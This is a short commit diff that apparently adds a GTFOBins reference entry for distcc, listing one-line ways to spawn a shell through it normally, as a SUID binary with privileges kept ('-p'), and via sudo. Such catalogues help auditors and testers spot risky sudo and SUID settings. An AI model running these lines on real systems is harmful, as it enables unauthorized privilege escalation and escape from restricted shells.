add distcc install: apt-get install -y distcc man: https://linux.die.net/man/1/distcc
1 files changed, 9 insertions(+), 0 deletions(-) A _gtfobins/distcc.md
A _gtfobins/distcc.md => _gtfobins/distcc.md +9 -0
@@ 0,0 1,9 @@ +--- +functions: + shell: + - code: distcc /bin/sh + suid: + - code: ./distcc /bin/sh -p + sudo: + - code: sudo distcc /bin/sh +---